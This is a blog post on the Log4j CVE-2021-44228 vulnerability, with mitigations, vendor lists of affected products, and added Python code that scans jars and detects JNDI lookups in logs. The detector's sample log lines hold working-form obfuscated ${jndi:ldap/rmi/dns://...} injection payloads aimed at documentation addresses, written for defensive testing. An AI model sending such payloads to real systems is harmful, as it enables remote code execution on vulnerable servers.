Apache Log4j 2 vulnerability CVE-2021-44228
By Alberto on December 11, 2021
A critical security vulnerability has been identified in the popular “Apache Log4j 2” library. This vulnerability is identified as CVE-2021-44228.
Apache Log4j 2 versions up to and including 2.14.1 do not protect the JNDI features used in configuration, log messages and parameters against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0 this behaviour is disabled by default. In earlier releases from 2.10 onwards it can be mitigated by setting the system property “log4j2.formatMsgNoLookups” to “true”; in any 2.x release it can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Apache later found the system property to be insufficient in some non-default configurations (CVE-2021-45046), so removing the class or upgrading is the more robust choice. Java 8u121 and later (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) default “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”, and 8u191 did the same for the LDAP equivalent “com.sun.jndi.ldap.object.trustURLCodebase”. Those defaults only block loading classes from a remote codebase; they do not block a JNDI reference that delivers a serialized object for deserialization on the target, so a recent JDK is not a substitute for fixing Log4j.
According to Apache’s advisory, all Apache Log4j 2.x versions up to and including 2.14.1 are vulnerable when message lookup substitution is enabled, which is the default in those versions.
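The two facts the advisory gives you, the affected version range and the JndiLookup class whose removal is the mitigation, are enough to triage a server. The following Python is an added example for this post, not code from the post or from the Log4j project: it walks a directory, reads the log4j-core version from each jar’s Maven pom.properties, checks whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still inside, recurses into jars nested in wars and ears, and can apply the class-removal mitigation by rewriting a jar (the same effect as the zip -q -d command above). The version boundaries and all function names are this example’s own; the sample jars it builds are constructed stubs containing only the two entries the scanner reads.

```python
"""Added example: find log4j-core jars under a directory and classify each one."""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")
# Boundaries as stated in the advisory above; later Apache advisories moved the
# fixed boundary further along the 2.x line, and this is where to adjust it.
FIXED_VERSION = (2, 15, 0)     # lookups disabled by default from this release
PROPERTY_VERSION = (2, 10, 0)  # first release honouring log4j2.formatMsgNoLookups

def parse_version(text):
    """'2.14.1' -> ((2, 14, 1), ''); '2.15.0-rc1' -> ((2, 15, 0), 'rc1')."""
    core, _, qualifier = text.strip().partition("-")
    return tuple(int(p) for p in core.split(".")), qualifier

def log4j_core_version(zf):
    """Version recorded in the jar's Maven pom.properties, or None if absent."""
    try:
        props = zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines()
    except KeyError:
        return None
    return next((l.split("=", 1)[1].strip() for l in props if l.startswith("version=")), None)

def classify(zf):
    """fixed / mitigated / vulnerable for an open log4j-core jar; None if it is not one."""
    version = log4j_core_version(zf)
    has_class = JNDI_LOOKUP_CLASS in zf.namelist()
    if version is None and not has_class:
        return None
    nums, qualifier = parse_version(version) if version else ((0,), "")
    if nums >= FIXED_VERSION and not qualifier:   # a release candidate is not trusted
        status = "fixed"
    elif not has_class:
        status = "mitigated"   # JndiLookup removed; still plan the upgrade
    else:                      # >=2.10: set the system property or remove the class;
        status = "vulnerable"  # <2.10: the property is ignored, remove the class
    return {"version": version, "has_jndi_lookup": has_class, "status": status}

def scan_archive(data, label, results):
    """Classify one archive held in memory, then recurse into archives nested in it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        info = classify(zf)
        if info:
            results[label] = info
        for name in zf.namelist():
            if name.lower().endswith(ARCHIVES):
                scan_archive(zf.read(name), label + "!" + name, results)

def scan_tree(root):
    """Walk root; return {path relative to root: classification} for each log4j-core."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read()
                try:
                    scan_archive(data, os.path.relpath(path, root), results)
                except zipfile.BadZipFile:
                    pass  # not a real archive; skip it
    return results

def remove_jndi_lookup(jar_path):
    """Rewrite a top-level jar without JndiLookup.class (same effect as zip -q -d above).
    Nested jars need extracting and repackaging; removing an entry also breaks any jar signature."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(item, src.read(item.filename))
    with open(jar_path, "wb") as fh:
        fh.write(buf.getvalue())
    return True

def build_sample_tree():
    """Constructed sample input (not real artifacts): jars holding only the entries read above."""
    def fake_jar(version, with_class=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPERTIES, "version=%s\n" % version)
            if with_class:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    for name, data in {"log4j-core-2.14.1.jar": fake_jar("2.14.1"),
                       "log4j-core-2.15.0-rc1.jar": fake_jar("2.15.0-rc1"),
                       "log4j-core-2.15.0.jar": fake_jar("2.15.0"),
                       "log4j-core-2.12.1-patched.jar": fake_jar("2.12.1", with_class=False)}.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:  # webapp bundling an old copy
        war.writestr("WEB-INF/lib/log4j-core-2.9.1.jar", fake_jar("2.9.1"))
    return root
```

Run scan_tree on a real deployment directory, or scan_tree(build_sample_tree()) to see the sample classifications: 2.14.1 and the nested 2.9.1 come back vulnerable, 2.15.0-rc1 is treated as vulnerable because a release candidate is not the fixed build, the jar with the class already stripped is mitigated, and 2.15.0 is fixed. After remove_jndi_lookup on the 2.14.1 jar a rescan reports it as mitigated; repeat the scan after any deployment, because rollbacks and re-extracted wars bring the class back.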
Affected products and services
Elastic has confirmed the vulnerability in the following products:
Elasticsearch (and the Open Distro variants)
Elastic Logstash
APM Java Agent
VMware has published a list of its affected products:
API Portal for VMware Tanzu
App Metrics
Healthwatch for Tanzu Application Service
Single Sign-On for VMware Tanzu Application Service
Spring Cloud Gateway for Kubernetes
Spring Cloud Gateway for VMware Tanzu
Spring Cloud Services for VMware Tanzu
VMware Carbon Black Cloud Workload Appliance
VMware Carbon Black EDR Servers
VMware Cloud Foundation
VMware HCX
VMware Horizon
VMware Identity Manager
VMware NSX-T Data Center
VMware Site Recovery Manager
VMware Tanzu Application Service for VMs
VMware Tanzu GemFire
VMware Tanzu Greenplum
VMware Tanzu Kubernetes Grid Integrated Edition
VMware Tanzu Observability by Wavefront Nozzle
VMware Tanzu Operations Manager
VMware Tanzu SQL with MySQL for VMs
VMware Telco Cloud Automation
VMware Unified Access Gateway
VMware vCenter Cloud Gateway
VMware vCenter Server
VMware vRealize Automation
VMware vRealize Lifecycle Manager
VMware vRealize Log Insight
VMware vRealize Operations
VMware vRealize Operations Cloud Proxy
VMware vRealize Orchestrator
VMware Workspace ONE Access
Cisco has published a list of its affected products:
Cisco Webex Meetings Server
Cisco Evolved Programmable Network Manager
Cisco Integrated Management Controller (IMC) Supervisor
Cisco Intersight Virtual Appliance
Cisco UCS Director
Cisco Unified Contact Center Enterprise - Live Data server
Cisco Video Surveillance Operations Manager
Cisco Unified Communications Manager Cloud
Cisco Webex Cloud-Connected UC (CCUC)
Cisco Common Services Platform Collector (CSPC)
Other products reported as affected so far:
Apereo CAS
Blender
Check Point Quantum Security Management
Connect2id server
Contrast Security self-hosted and cloud
Couchbase Elasticsearch Connector
cPanel via Solr plugin
Dynatrace Synthetic Chromium
Forcepoint Security Manager & DLP Manager
Ghidra
GoAnywhere
Grails
Graylog
Jamf Pro
JGAAP
Jitsi video bridge
Kafka Connect CosmosDB
Metabase
Minecraft clients and servers
N-able Risk Intelligence
Nelson
Neo4j
New Relic Java Agent
Okta Radius Server Agent & On-Prem MFA Agent
openHAB
OpenNMS
OpenSearch
PagerDuty Rundeck
Pegasystems self-hosted
Positive Technologies MaxPatrol VM
Puppet Continuous Delivery for Puppet Enterprise
PureStorage Portworx (and possibly other products)
Red Hat (reporting affected packages)
RSA SecurID Authentication Manager
SecurityOnion
Sophos Mobile EAS Proxy
Splunk
Spring Boot (if log4j was configured)
SwingSet
Talend Component Kit
Ubiquiti UniFi Network Application
Wowza Streaming Engine
ZAP Proxy
When Apache’s official patch was released, 2.15.0-rc1 was initially reported to fix CVE-2021-44228. A bypass of that release candidate was then discovered, and 2.15.0-rc2 was released in its place; rc2 protects users against this vulnerability.
According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library’s configuration is set to false.
In a conversation today, Heige, the founder and CEO of Chinese security firm KnownSec 404 Team and one of the first researchers to understand the vulnerability’s impact, told The Record that today’s Log4j 2.15.0 release basically sets this option to true in order to block attacks.
Unfortunately, this option is set to false by default in older releases, so every Log4j 2.x release from 2.10.0 (when the option was added) up to 2.14.1 is vulnerable by default. Releases before 2.10.0 are vulnerable as well and do not honour the option at all; for those, the only mitigation short of upgrading is removing the JndiLookup class as described above.
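Lookup substitution is also what makes detection harder than grepping access logs for “${jndi:”. Log4j resolves nested ${...} lookups innermost first, and ${name:-default} yields the default when the lookup fails, so ${${lower:j}ndi:...} or ${${::-j}ndi:...} reach the JNDI lookup just as well as the plain form. The Python below is an added example, not code from the post or from the Log4j project: it resolves the lower, upper and default-value forms the way Log4j’s substitutor does, leaves other lookups in place, then matches ${jndi:<scheme>://<host>. The log lines are constructed for the example and use RFC 5737 documentation addresses; the function names are this example’s own.

```python
"""Added example: spot ${jndi:...} lookups in log lines, including obfuscated ones."""
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI_REF = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*)://([^/}\s]*)", re.IGNORECASE)

# Constructed sample lines (Apache combined-log style, RFC 5737 documentation addresses),
# not captured traffic. The fifth and sixth lines are benign.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:22:14:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.5:1389/x}"',
    '198.51.100.23 - - [10/Dec/2021:22:14:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.10:1099/o}"',
    '198.51.100.23 - - [10/Dec/2021:22:14:04 +0000] "POST /search HTTP/1.1" 200 88 "-" "${${env:ENV_NAME:-j}${upper:n}di:dns://203.0.113.5/tok}"',
    '198.51.100.24 - - [10/Dec/2021:22:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '198.51.100.24 - - [10/Dec/2021:22:14:06 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1 ${ctx:requestId}"',
]

def resolve_lookups(text):
    """Resolve nested ${...} the way Log4j's substitutor does, innermost first.

    Handled here: ${lower:X}, ${upper:X} and the ${name:-default} fallback, which is
    what the obfuscated payloads rely on. ${jndi:...} is kept as the thing we look for,
    and any other lookup (env, sys, ctx, ...) is left in place unless it has a default."""
    def substitute(match):
        body = match.group(1)
        name, has_default, default = body.partition(":-")
        prefix, has_prefix, key = name.partition(":")
        prefix = prefix.lower()                      # Log4j lower-cases the lookup prefix
        if has_prefix and prefix == "lower":
            return key.lower()
        if has_prefix and prefix == "upper":
            return key.upper()
        if has_prefix and prefix == "jndi":
            return "\x01" + body + "\x02"            # terminal: keep, but stop re-matching
        if has_default:
            return default                           # failed lookup falls back to its default
        return "\x01" + body + "\x02"                # unresolvable offline: leave as is

    while True:
        resolved = INNERMOST.sub(substitute, text)
        if resolved == text:
            break
        text = resolved
    return text.replace("\x01", "${").replace("\x02", "}")

def naive_match(line):
    """The check many first-day WAF rules used; it misses every obfuscated form."""
    return "${jndi:" in line.lower()

def find_jndi_lookups(line):
    """[(scheme, host)] for every ${jndi:...} reachable once lookups are resolved."""
    return [(scheme.lower(), host) for scheme, host in JNDI_REF.findall(resolve_lookups(line))]

def scan_log(lines):
    """[(line number, scheme, host)] for every hit across the given log lines."""
    return [(n, scheme, host) for n, line in enumerate(lines, 1)
            for scheme, host in find_jndi_lookups(line)]

if __name__ == "__main__":
    for n, scheme, host in scan_log(SAMPLE_LOG):
        print("line %d: JNDI lookup via %s to %s (naive rule matched: %s)"
              % (n, scheme, host, naive_match(SAMPLE_LOG[n - 1])))
```

On the sample, naive_match fires only on the first line while scan_log reports all four payloads with their scheme and callback host, which is the list you hand to the network team for egress blocking. The resolver deliberately does not evaluate env, sys or ctx lookups against the real environment, so a payload that depends on one of those without a default is left unresolved; treat any remaining ${...} in untrusted input as suspicious in its own right.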
The CVE-2021-44228 vulnerability is still being actively investigated to establish its full scope and severity. Based on the information currently available, its impact is high now and is likely to remain so, because many of the affected applications are widely used in both corporate and home networks. Users are encouraged to take all necessary steps to protect themselves, as outlined above.